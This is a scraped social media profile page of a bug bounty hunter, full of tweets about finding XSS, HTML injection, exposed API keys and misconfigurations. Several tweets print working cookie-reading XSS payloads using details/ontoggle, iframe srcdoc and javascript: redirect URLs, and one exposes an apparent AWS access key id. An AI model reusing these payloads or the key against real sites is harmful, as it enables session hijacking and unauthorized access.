Siddhartha S
@sidharthas8962
Followers
1,063
Following
334
Media
57
Statuses
511
Security Researcher
same planet as you
Joined February 2022
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
الهلال
• 621356 Tweets
River
• 262089 Tweets
Dubois
• 109012 Tweets
Román
• 94325 Tweets
Michigan
• 93493 Tweets
Romero
• 81875 Tweets
Riquelme
• 75316 Tweets
Gallardo
• 73411 Tweets
#precure
• 53768 Tweets
Oklahoma
• 47930 Tweets
#仮面ライダーガヴ
• 34992 Tweets
Iowa
• 31536 Tweets
Tennessee
• 31397 Tweets
Janet Jackson
• 29833 Tweets
秋分の日
• 29210 Tweets
秒速5センチメートル
• 25399 Tweets
Auburn
• 21954 Tweets
#ブンブンジャー
• 17714 Tweets
ショウマ
• 12880 Tweets
Usyk
• 11205 Tweets
ダブルドライバー
• 11162 Tweets
Pinned Tweet
Hello everyone, I found 100 of emails of customers by running waybackurls on my target, now after visiting the URL I can send unlimited password reset emails to customers. I reported this to company, and they didn't consider it. any tip to increase my severity.
#hackingtime
14
5
156
Hello everyone, I have just found a API-Key in .Js file. But don't know what kind of this API-Key is?
If you have any idea about, where I can identify this. Please let me know.
#Hackingtime
#BugBounty
37
19
364
Hello everyone. I have found a stored xss.
payload by
@coffinxp7
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);">
7
38
308
Hello everyone, I have found again Information Disclosure bug on BBP, hope they reward.
#Hackingtime
#BugBounty
8
12
168
Today I have found 10+ CORS misconfiguration
in 2 websites with valid Video POC and screenshot also.
3 reported. I used an automatic tool and then I checked manually for Video POC.
A special thanks for my friend and supportive
@coffinxp7
#BugBounty
#hackers
8
16
155
Mass hunting of CVE-2024-34102
A big thanks to
@coffinxp7
for amazing idea.
but don't know if they are running bug bounty program or not, could you please help me.
@coffinxp7
6
14
150
Hey everyone, I have found 3 bugs in just 30 minutes.
1. html injection
2. html injection to open redirection and redirected to CIA.🥰😍
3. reflected XSS
#bugbounty
#bugbountytips
8
1
145
Hello everyone, during my directory-brute forcing on target subdomain by dirb, I have found multiple directories with 200 OK but when I check manually it is giving me error 404 not found. I don't know why. have you any suggestions, let me know
#Hackingtime
29
3
125
Hey
@coffinxp7
your XSS payload is really worked for me, thanks again for sharing.
let's see what happens next because payload fired in chatbot which is created by program itself.
8
1
126
I have found a XSS on A BBP. hey
@coffinxp7
you payload is really help full. I have just copied the payload and open BBP and paste the payload after the hit Enter the payload got fired.
8
13
124
Hey everyone, recently I have found a bug here are the details:
Bug type: sensitive information discloser
Bounty: 150EUR
thanks to
#bugbounty
#Hackingtime
11
2
88
Hello everyone, I have found multiple API-key disclosure in .JS fiie. on BBP. hope they reward
#Hackingtime
#BugBounty
15
1
89
I have found 30+ Blind XSS in one website.
almost every parameter is vulnerable to blind xss.
#bugbounty
#hackers
7
8
84
Hey everyone, I have found multiple HTML injection in chat bot, should I report this?
#BugBounty
#bugbountytips
1. payload <img src="index.jpg" alt="
@coffinxp
in a Jacket" width="1000" height="600">
6
10
83
Hello everyone, I have found a stored XSS via Svg file upload, payload credit my brother
@coffinxp7
#hackingtime
Hey
@coffinxp7
can you share your favorite image I want to try like this
3
6
57
Hello everyone, I was hunting on a program,
during directory-brute forcing I have found a folder like /git/ I opened the domain and found this>> but don't what is this, if you have any idea, please let me know.
12
3
53
@Steiner254
@coffinxp7
<iframe srcdoc="<img src=x onerror=alert(999)>"></iframe>
/path?next=javascript:top[/al/.source+/ert/.source](document.cookie)
login?redirectUrl=javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain
0
10
47
Hello everyone, recently I have submitted a bug to h☆☆☆☆1
But got duplicate after 3 informational because this was submitted by another Researcher. But I am happy with that. Atleast I have found a valid bug I think.
#Hackingtime
#bugbounty
7
1
46
Hello everyone, I have found an Information Disclosure bug, Index of /. git but after checking their BB page they clearlily have mentioned that they don't provide bounty for bugs, So I didn't report them. They also have bbp on bug crowd.
#Hackingtime
#BugBounty
3
2
44
Hello everyone, I have just got small 50$ bounty for reporting a bug.
Bug type> AWS Api-KEY disclosure
#Hackingtime
#bugbounty
11
1
40
Hello everyone, help me to understand this.
#bugbountytip
@coffinxp7
even my BXSS payload also fired here.
6
1
30
Hello everyone
I have found a file called /.DS_Store via directory brute forcing. is this sensitive, should I report it.
#bugbounty
#hackers
8
1
31
Update:
they replied, we use a third-party vendor for this msg'ing function so nothing we can do on our side. I agreed with them, because they cleared mention in their policy.
by the away i have learned a new bug type.
#BugBounty
#Hackingtime
Hey everyone, I have found multiple HTML injection in chat bot, should I report this?
#BugBounty
#bugbountytips
1. payload <img src="index.jpg" alt="
@coffinxp
in a Jacket" width="1000" height="600">
6
10
83
0
1
24
Happy birthday to a mastermind hacker who continuously pushes the boundaries of possibility. May your skills remain sharp, and may you always stay one step ahead. Have an amazing celebration!
Keep hacking.
"Best wishes for you, as a Security Researcher prospective"
@coffinxp7
1
1
23
Hello everyone, I have found REACT_APP_FIREBASE_DEV_API_KEY disclose in .js file.
but Company said this is not vulnerability. how can escalate to this, if possible, if you have any idea, please let me know,
#Hackingtime
#BugBounty
2
0
22
I will never forget the day. We met for the first time on social media and I was completely unaware that you would mean so much to me.
@coffinxp7
@hexsh1dow
@sidharthas8962
4
1
18
Hello brother,
@coffinxp7
I tried your BSQLI tool on different-different website, And I think it's the best tool for find bsqli with automation, but when I visit the vulnerable url/parameter the WAF is blocking me.
Any suggestions.?
1
1
19
Great achievement brother.
Keep pushing the boundaries of hacking In ethical way.
#Longlive
@coffinxp7
#lostsec
1
1
17
Recently I was hunting bugs on a private program.
when I was analyzing the .js file, I found this amazon_aws_access_key_id = AkiAknZCcwHAwAusAD98 is this bug or not. If its bug then what's impact of this, and how can show impact to that program.
#bugbounty
@coffinxp7
@_anonysm
4
1
15
Hey
@coffinxp7
can you please make a video about csrf how can find, report, all about csrf, also how can I find csrf by XSRFProbe tool.
1
0
14
Hello everyone I have found a subdomain takeover vulnerability which is vulnerable to helpscout.
But I am not able to create a account because there strict signup prosses. What should I do?
#bugbounty
#bugbountytips
0
0
14
@torik_1999
@coffinxp7
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);">
0
0
14
Hey
@coffinxp7
what color your Bugatti is. I can design in html let's see some sample if this is your favorite color
let me know. 😍🥰
#bugbounty
#bugbountytips
comment for color change.
HTML injection.
1
0
14
Great achievement brother.
Keep growing.
created a powerful Blind SQLi tool that detect sqli with 100% acuracy with 0% false postive issue uploading soon..
just working on the all types payloads for different DBMS
28
78
621
1
1
12
I have found multiple directory listening vulnerability leads to disclose sensitive information in self hosted VRP which are providing bounty for that, but till that no response from companies.
#BugBounty
#hackers
1
1
12
I have submitted a bug report to a BBP, the company reply my mail here are screenshot.
1
0
11
Happy to see my brother
@coffinxp7
that you have achieved 10k followers on
@X
Wishing a filled with clandestine operations, encrypted communications, and ingenious exploits to a hacker who walks the line between genius and madness. Celebrate your day in true hacker fashion!
2
1
11
Hey
@coffinxp7
how to find ip addresses of all subdomain in one step, do you have any tool which can find ip addresses of subdomain file file. Please let me know.
#bug
#hacking
0
0
10
Are you BlackHat Hacker.
If yes then you need to hide you identity forever from internet.
Because you have performed multiple cyber attacks and defaced there website/organization. Bye the away I love your content and your hacking skills. Keep hacking, keep growing.
3
0
11
Knock knock
FBI FBI
They are searching you, by land to land because they can't trace your location.
Malaysia top gambling casino betting site Strong WAF Bypassed !
But they have not contact email support what i do now ?
22
9
209
1
0
11
Wow, happy to see that I am verified. Without buying premium.
2
0
10
Agreed.
no one is permanent in life, everyone comes for a particular period of time. so enjoy the phase of life & move on
4
5
64
0
0
9
Don't disappear brother.
FBI needs you for catching cyber criminalS
1
0
9
Congratulations brother.
our latest bug hunting tool is featured in Recorded Future insikt research artical threat intel platform this is crazyy🔥🏆
16
27
248
1
0
9
Once again,
Wishing a mind-blowing birthday to a hacker whose coding skills are the envy of the digital underworld. May your exploits be celebrated, your systems impenetrable, ""and your identity forever hidden in the shadows."" Keep hacking like professional.
@coffinxp7
1
0
7
Note:: always use wpscan if your target website is running on wordpress for find directory listening bugs and other bugs like theme and plugins related.
Cmd:: wpscan --url --api key -e --random agent -f for force if there any waf if blocking you...
0
1
7
Hello everyone, again submitted a by me got duplicate, because its reported by another Researcher. Feel sad, why companies didn't pathed the bug if they have already information of that bug or submitted by another Researcher
#Hackingtime
#BugBounty
2
0
7
Hello everyone.
I have embedded a XSS payload in pdf file.
when I was trying to open this file in Firefox or chrome.
the XSS payload is triggered. is this bug or not.
#bugbounty
#hackers
@coffinxp7
Kindly help.
4
1
7
Hello Security Team of
@recruitlyio
I have submitted a bug to you 2 month ago by email. Why did you haven't pathed the bug and didn't response, if you don't care about Security, then why are running bug bounty for just show off that you care about Security and user privacy.
1
0
6
Mine is LostSec_007
1
0
6
@coffinxp7
@Hacker0x01
@ICICIBank
@ICICIBank_Care
Because they don't care of user data, privacy. I have also found multiple bugs in Indian private bank, but I didn't receive any response from 15 days.
0
0
6
Hello Team of
@Wildix_
I have submitted multiple bugs report to you by email.
Kindly patch the bugs as soon as possible.
and response.
Sidhartha
Security Researcher
0
1
5
Hello
@RunOnFlux
I have submitted a Vulnerability report to you by email, why guys you all not responding to researcher mails. if you haven't time to reply to researcher mails, then why your running Bug Bounty program on internet.
0
1
6
Hello everyone, recently I have submitted 4 Information Disclosure bugs to bugcrowd.
Here are the details.
1nd duplicate, submitted by another Researcher.
2nd duplicate, submitted by another Researcher
3nd not applicable
4nd not applicable due to not exploit.
#Hackingtime
#Bugs
1
0
6
@pentesterzaman
So basically I used dirb tool for directory brute forcing and I found /.git/config enabled I visited the url and found some Information. I reported.
1
1
5
@coffinxp7
@InternetH0F
Hope I will join you in future. And do some contribution to hack the scammers.
0
0
5
I have found my first bug on private program.
through
@bugcrowd
but its informational because I am unable to exploit the bug.
But I am happy with that.
1
0
4
I will try and share result with you soon. Brother, By the away thanks for sharing. I know it will be cool..
so finally wait is over i released my customBsqli tool i hope this will help you all in bbp to find timebased sqli..
31
126
533
2
0
5
hey
@IDFCFIRSTBank
I am A Security Researcher
I have found multiple bugs on your website.
How can I report to you.
That you can secure your website/web applications,
1
1
5
Hello
@InfoSecComm
I have found some bugs on your site, how can I report to you. let me know.
#Hackingtime
#BugBounty
0
0
4
Hey
@immunefi
I am Security Researcher.
I have found a bug in a bug bounty program which are registered on your platform, I want to submit report to that program, but I am confused what type of wallet need to receive a payment.
Kindly Response.
3
0
4
- Physical and mental health concerns: Hunters must prioritize self-care to avoid burnout and health issues.
In summary, while bug bounty hunting can be a rewarding career, it comes with significant financial, emotional, and professional challenges also.
Photos by
@AIatMeta
0
0
4
@_anonysm
The power of your subconscious mind. By Dr. Joseph Murphy
You should also read this book.
My recommendation.
1
0
4
Hello
@bugvsecurity
I created a account on and did not receive verification email. I am unable to login.
0
0
4
@coffinxp7
@hexsh1dow
@rinz0h
@PortSwigger
@github
Life is full of this type of people everywhere, don't be sad
@coffinxp7
If the Team of portswigger or github forced you delete that, then delete it brother.
You have faced takedown of multiple channel's, yt videos and manythings.
1
0
4
Hello everyone, this is my first time, I am trying to find ssrf, I have attached the interactsh payload in svg and uploaded into profile pictures, and don't know next steps. if it is valid. please let me know if you have any references.
#Hackingtime
0
0
4
Keep hacking..
0
0
4
Hello
@helpscout
I want to create a account for my web application.
But unfortunately I couldn't create a account.
Please try to solve my problem as soon as possible.
Please
@help
@helpscout
.
I am waiting for your response.
2
0
2
*Continuous Learning Required*
- Constantly evolving field: Cybersecurity and technology are constantly changing
- Significant time and effort required: Hunters must stay up-to-date with the latest tools, techniques, and technologies.
1
0
3
*High Stress Levels*
- Pressure to constantly find bugs: Hunters are under pressure to meet program requirements and stay ahead of the competition
- Fear of missing out (FOMO): Hunters may feel anxious about missing potential bugs or payouts.
1
0
3
@coffinxp7
That's why I only report to sensitive endpoint like
Is this sensitive endpoints or not.
Please reply?
1
0
3
@HackenProof
You should start giving money for hackers for p5 submission.
I hope you understand.
1
0
3
*Isolation and Solo Work*
- Limited social interaction: Bug bounty hunting can be a solo activity
- Isolation can lead to feelings of loneliness and disconnection.
*Other Disadvantages*
1
0
3
- Long hours and flexible schedule: Hunters may work irregular hours to meet program deadlines
- Limited benefits: No traditional employment benefits like health insurance, retirement plans, or paid time off
- Legal and ethical risks: Hunters must navigate complex guidelines.
1
0
3
Hello
@duocirclellc
I am a Security Researcher
I have submitted bug report to you. Why your are not responding to us. Fix the bug and Response.
1
0
3
@tabaahi_
I was also hunting found /.htaccess file
its is bug or not?
Kindly Response brother.
0
0
3